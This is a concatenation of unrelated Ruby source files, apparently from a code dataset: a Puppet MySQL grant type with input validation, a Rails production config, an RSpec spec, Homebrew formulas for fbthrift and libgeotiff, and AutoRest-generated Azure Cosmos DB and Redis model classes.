|k| ['GRANT', 'GRANT OPTION'].include?(k) }.sort! end # rubocop:enable Style/MultilineBlockChain validate do raise(_('mysql_grant: `privileges` `parameter` is required.')) if self[:ensure] == :present && self[:privileges].nil? raise(_('mysql_grant: `privileges` `parameter`: PROXY can only be specified by itself.')) if Array(self[:privileges]).size > 1 && Array(self[:privileges]).include?('PROXY') raise(_('mysql_grant: `table` `parameter` is required.')) if self[:ensure] == :present && self[:table].nil? raise(_('mysql_grant: `user` `parameter` is required.')) if self[:ensure] == :present && self[:user].nil? if self[:user] && self[:table] raise(_('mysql_grant: `name` `parameter` must match user@host/table format.')) if self[:name] != "#{self[:user]}/#{self[:table]}" end end newparam(:name, namevar: true) do desc 'Name to describe the grant.' munge do |value| value.delete("'") end end newproperty(:privileges, array_matching: :all) do desc 'Privileges for user' validate do |value| mysql_version = Facter.value(:mysql_version) if value =~ %r{proxy}i && Puppet::Util::Package.versioncmp(mysql_version, '5.5.0') < 0 raise(ArgumentError, _('mysql_grant: PROXY user not supported on mysql versions < 5.5.0. Current version %{version}.') % { version: mysql_version }) end end end newproperty(:table) do desc 'Table to apply privileges to.' validate do |value| if Array(@resource[:privileges]).include?('PROXY') && !%r{^[0-9a-zA-Z$_]*@[\w%\.:\-\/]*$}.match(value) raise(ArgumentError, _('mysql_grant: `table` `property` for PROXY should be specified as proxy_user@proxy_host.')) end end munge do |value| value.delete('`') end newvalues(%r{.*\..*}, %r{^[0-9a-zA-Z$_]*@[\w%\.:\-/]*$}) end newproperty(:user) do desc 'User to operate on.' validate do |value| # http://dev.mysql.com/doc/refman/5.5/en/identifiers.html # If at least one special char is used, string must be quoted # http://stackoverflow.com/questions/8055727/negating-a-backreference-in-regular-expressions/8057827#8057827 # rubocop:disable Lint/AssignmentInCondition # rubocop:disable Lint/UselessAssignment if matches = %r{^(['`"])((?!\1).)*\1@([\w%\.:\-/]+)$}.match(value) user_part = matches[2] host_part = matches[3] elsif matches = %r{^([0-9a-zA-Z$_]*)@([\w%\.:\-/]+)$}.match(value) user_part = matches[1] host_part = matches[2] elsif matches = %r{^((?!['`"]).*[^0-9a-zA-Z$_].*)@(.+)$}.match(value) user_part = matches[1] host_part = matches[2] else raise(ArgumentError, _('mysql_grant: Invalid database user %{user}.') % { user: value }) end # rubocop:enable Lint/AssignmentInCondition # rubocop:enable Lint/UselessAssignment mysql_version = Facter.value(:mysql_version) unless mysql_version.nil? raise(ArgumentError, _('mysql_grant: MySQL usernames are limited to a maximum of 16 characters.')) if Puppet::Util::Package.versioncmp(mysql_version, '5.7.8') < 0 && user_part.size > 16 raise(ArgumentError, _('mysql_grant: MySQL usernames are limited to a maximum of 32 characters.')) if Puppet::Util::Package.versioncmp(mysql_version, '10.0.0') < 0 && user_part.size > 32 raise(ArgumentError, _('mysql_grant: MySQL usernames are limited to a maximum of 80 characters.')) if Puppet::Util::Package.versioncmp(mysql_version, '10.0.0') > 0 && user_part.size > 80 end end munge do |value| matches = %r{^((['`"]?).*\2)@(.+)$}.match(value) "#{matches[1]}@#{matches[3].downcase}" end end newproperty(:options, array_matching: :all) do desc 'Options to grant.' end end
43.286885
194
0.616171
3841811cd35a43b08a2ccc7f4be7d19fcf63aad8
551
Rails.application.configure do config.cache_classes = true config.eager_load = true config.consider_all_requests_local = false config.action_controller.perform_caching = true config.serve_static_assets = false config.assets.js_compressor = :uglifier config.assets.compile = false config.assets.digest = true config.log_level = :debug config.i18n.fallbacks = true config.active_support.deprecation = :notify config.log_formatter = ::Logger::Formatter.new config.active_record.dump_schema_after_migration = false end
30.611111
58
0.780399
03357d0732d07b283c318b74784e9e4302bd8b6b
1,591
# encoding: utf-8 require File.expand_path('../spec_helper.rb', __FILE__) describe 'Backup::Configuration' do after do Backup::Configuration.send(:remove_const, 'Foo') end it 'should create modules for missing constants' do Backup::Configuration::Foo.class.should == Module end describe 'a generated module' do before do module Backup class Foo; end end end after do Backup.send(:remove_const, 'Foo') end it 'should create modules for missing constants' do Backup::Configuration::Foo::A::B.class.should == Module end it 'should pass calls to .defaults to the proper class' do Backup::Logger.expects(:warn) Backup::Foo.expects(:defaults) Backup::Configuration::Foo.defaults end it 'should pass a given block to .defaults to the proper class' do Backup::Logger.expects(:warn) configuration = mock Backup::Foo.expects(:defaults).yields(configuration) configuration.expects(:foo=).with('bar') Backup::Configuration::Foo.defaults do |config| config.foo = 'bar' end end it 'should log a deprecation warning' do Backup::Foo.stubs(:defaults) Backup::Logger.expects(:warn).with do |err| err.message.should == "ConfigurationError: [DEPRECATION WARNING]\n" + " Backup::Configuration::Foo.defaults is being deprecated.\n" + " To set pre-configured defaults for Backup::Foo, use:\n" + " Backup::Foo.defaults" end Backup::Configuration::Foo.defaults end end end
25.253968
72
0.649277
f80bd240b65fa842733a13370e5bd9564c5df5ea
358
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Cosmosdb::Mgmt::V2015_04_08 module Models # # Defines values for IndexKind # module IndexKind Hash = "Hash" Range = "Range" Spatial = "Spatial" end end end
21.058824
70
0.670391
1a257aa18f87a2ab62d1eb6a4dadc5c79853a714
3,326
class Fbthrift < Formula desc "Facebook's branch of Apache Thrift, including a new C++ server" homepage "https://github.com/facebook/fbthrift" url "https://github.com/facebook/fbthrift/archive/v2022.05.16.00.tar.gz" sha256 "dfc15d27f25d33e25f23b42a391d45f1c890727a271a4d078e035e374d3c5666" license "Apache-2.0" head "https://github.com/facebook/fbthrift.git", branch: "main" bottle do sha256 cellar: :any, arm64_monterey: "9d43b1a9a9bc2403a054cccf9b2ac150bb9481607beeaee285dab5e4feadfabf" sha256 cellar: :any, arm64_big_sur: "0f165329de0341c6bac949a0c2b660a1c65068ff003f0dfe83335a3b1fe72f08" sha256 cellar: :any, monterey: "970459281f31fad7c9295d5f7d828628ca8248673afc3ee9579f0b36a4867e87" sha256 cellar: :any, big_sur: "09635f364183f07489413e9189fb29998e993556456e819beeea7093fc96b032" sha256 cellar: :any, catalina: "560d580a54a274be4f583d1bbb620b435d51761392e4218e4b2ba250a93c8bd0" sha256 cellar: :any_skip_relocation, x86_64_linux: "9d57278ac7db7f5c22d21d178560ac9e9764fb5d5b92a8a6ed21468b88314ee3" end depends_on "bison" => :build # Needs Bison 3.1+ depends_on "cmake" => :build depends_on "boost" depends_on "fizz" depends_on "fmt" depends_on "folly" depends_on "gflags" depends_on "glog" depends_on "[email protected]" depends_on "wangle" depends_on "zstd" uses_from_macos "flex" => :build uses_from_macos "zlib" on_macos do depends_on "llvm" if DevelopmentTools.clang_build_version <= 1100 end on_linux do depends_on "gcc@10" end fails_with :clang do build 1100 cause <<~EOS error: 'asm goto' constructs are not supported yet EOS end fails_with gcc: "5" # C++ 17 fails_with gcc: "11" # https://github.com/facebook/folly#ubuntu-lts-centos-stream-fedora # Fix build failure on Catalina. # https://github.com/facebook/fbthrift/pull/500 patch do url "https://github.com/facebook/fbthrift/commit/eb566ef3fd748c04ecd6058351644edee0d02dbf.patch?full_index=1" sha256 "12286a10e3802e15ea03ea4853edd8640f9e5aedcac662b324a708625348a809" end def install ENV.llvm_clang if OS.mac? && (DevelopmentTools.clang_build_version <= 1100) # The static libraries are a bit annoying to build. If modifying this formula # to include them, make sure `bin/thrift1` links with the dynamic libraries # instead of the static ones (e.g. `libcompiler_base`, `libcompiler_lib`, etc.) shared_args = ["-DBUILD_SHARED_LIBS=ON", "-DCMAKE_INSTALL_RPATH=#{rpath}"] shared_args << "-DCMAKE_SHARED_LINKER_FLAGS=-Wl,-undefined,dynamic_lookup" if OS.mac? system "cmake", "-S", ".", "-B", "build/shared", *std_cmake_args, *shared_args system "cmake", "--build", "build/shared" system "cmake", "--install", "build/shared" elisp.install "thrift/contrib/thrift.el" (share/"vim/vimfiles/syntax").install "thrift/contrib/thrift.vim" end test do (testpath/"example.thrift").write <<~EOS namespace cpp tamvm service ExampleService { i32 get_number(1:i32 number); } EOS system bin/"thrift1", "--gen", "mstch_cpp2", "example.thrift" assert_predicate testpath/"gen-cpp2", :exist? assert_predicate testpath/"gen-cpp2", :directory? end end
37.370787
123
0.715574
5d01823afd380711336fd58fc9b252a8409abcb8
1,106
class Libgeotiff < Formula desc "Library and tools for dealing with GeoTIFF" homepage "http://geotiff.osgeo.org/" url "http://download.osgeo.org/geotiff/libgeotiff/libgeotiff-1.4.1.tar.gz" sha256 "acfc76ee19b3d41bb9c7e8b780ca55d413893a96c09f3b27bdb9b2573b41fd23" revision 1 bottle do sha256 "2d90f23486794745cbf3880b8327f6c9b8d1ee5b3952b599d372e139e3fa386a" => :el_capitan sha256 "cc50df08d046654c4dcdb71dca892522ddbe7f4d08bf76db875843b5278f8c72" => :yosemite sha256 "a06efe08c1bd6a4c8c2e17d8081bafb2c6fd7e6a46083d7ff3228f98d3dca7e3" => :mavericks sha256 "07efe6adec3e35b7e3d05af18e62a407041d84a96fa91a64757aa1e0b4696fd6" => :mountain_lion end depends_on "libtiff" depends_on "lzlib" depends_on "jpeg" depends_on "proj" def install args = ["--disable-dependency-tracking", "--prefix=#{prefix}", "--with-libtiff=#{HOMEBREW_PREFIX}", "--with-zlib=#{HOMEBREW_PREFIX}", "--with-jpeg=#{HOMEBREW_PREFIX}"] system "./configure", *args system "make" # Separate steps or install fails system "make", "install" end end
36.866667
95
0.740506
38fec077b826194731549421a0cd4bc6413372e4
9,430
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Redis::Mgmt::V2017_02_01 module Models # # A single Redis item in List or Get Operation. # class RedisResource < TrackedResource include MsRestAzure # @return [Hash{String => String}] All Redis Settings. Few possible keys: # rdb-backup-enabled,rdb-storage-connection-string,rdb-backup-frequency,maxmemory-delta,maxmemory-policy,notify-keyspace-events,maxmemory-samples,slowlog-log-slower-than,slowlog-max-len,list-max-ziplist-entries,list-max-ziplist-value,hash-max-ziplist-entries,hash-max-ziplist-value,set-max-intset-entries,zset-max-ziplist-entries,zset-max-ziplist-value # etc. attr_accessor :redis_configuration # @return [Boolean] Specifies whether the non-ssl Redis server port # (6379) is enabled. attr_accessor :enable_non_ssl_port # @return [Hash{String => String}] tenantSettings attr_accessor :tenant_settings # @return [Integer] The number of shards to be created on a Premium # Cluster Cache. attr_accessor :shard_count # @return [String] The full resource ID of a subnet in a virtual network # to deploy the Redis cache in. Example format: # /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/Microsoft.{Network|ClassicNetwork}/VirtualNetworks/vnet1/subnets/subnet1 attr_accessor :subnet_id # @return [String] Static IP address. Required when deploying a Redis # cache inside an existing Azure Virtual Network. attr_accessor :static_ip # @return [Sku] The SKU of the Redis cache to deploy. attr_accessor :sku # @return [String] Redis version. attr_accessor :redis_version # @return [String] Redis instance provisioning status. attr_accessor :provisioning_state # @return [String] Redis host name. attr_accessor :host_name # @return [Integer] Redis non-SSL port. attr_accessor :port # @return [Integer] Redis SSL port. attr_accessor :ssl_port # @return [RedisAccessKeys] The keys of the Redis cache - not set if this # object is not the response to Create or Update redis cache attr_accessor :access_keys # @return [RedisLinkedServerList] List of the linked servers associated # with the cache attr_accessor :linked_servers # # Mapper for RedisResource class as Ruby Hash. # This will be used for serialization/deserialization. # def self.mapper() { client_side_validation: true, required: false, serialized_name: 'RedisResource', type: { name: 'Composite', class_name: 'RedisResource', model_properties: { id: { client_side_validation: true, required: false, read_only: true, serialized_name: 'id', type: { name: 'String' } }, name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'name', type: { name: 'String' } }, type: { client_side_validation: true, required: false, read_only: true, serialized_name: 'type', type: { name: 'String' } }, tags: { client_side_validation: true, required: false, serialized_name: 'tags', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, location: { client_side_validation: true, required: true, serialized_name: 'location', type: { name: 'String' } }, redis_configuration: { client_side_validation: true, required: false, serialized_name: 'properties.redisConfiguration', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, enable_non_ssl_port: { client_side_validation: true, required: false, serialized_name: 'properties.enableNonSslPort', type: { name: 'Boolean' } }, tenant_settings: { client_side_validation: true, required: false, serialized_name: 'properties.tenantSettings', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, shard_count: { client_side_validation: true, required: false, serialized_name: 'properties.shardCount', type: { name: 'Number' } }, subnet_id: { client_side_validation: true, required: false, serialized_name: 'properties.subnetId', constraints: { Pattern: '^/subscriptions/[^/]*/resourceGroups/[^/]*/providers/Microsoft.(ClassicNetwork|Network)/virtualNetworks/[^/]*/subnets/[^/]*$' }, type: { name: 'String' } }, static_ip: { client_side_validation: true, required: false, serialized_name: 'properties.staticIP', constraints: { Pattern: '^\d+\.\d+\.\d+\.\d+$' }, type: { name: 'String' } }, sku: { client_side_validation: true, required: false, serialized_name: 'properties.sku', type: { name: 'Composite', class_name: 'Sku' } }, redis_version: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.redisVersion', type: { name: 'String' } }, provisioning_state: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.provisioningState', type: { name: 'String' } }, host_name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.hostName', type: { name: 'String' } }, port: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.port', type: { name: 'Number' } }, ssl_port: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.sslPort', type: { name: 'Number' } }, access_keys: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.accessKeys', type: { name: 'Composite', class_name: 'RedisAccessKeys' } }, linked_servers: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.linkedServers', type: { name: 'Composite', class_name: 'RedisLinkedServerList' } } } } } end end end end
33.439716
358
0.468187